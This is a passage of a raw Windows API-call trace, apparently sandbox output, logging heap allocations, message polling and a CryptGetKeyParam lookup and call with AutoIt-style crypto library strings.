0x9c26a8 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0191.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0191.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0191.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.859] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.860] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2708, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2708*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0191.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0191.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.861] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.861] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0191.862] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.862] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.862] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.862] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.862] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.863] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.863] 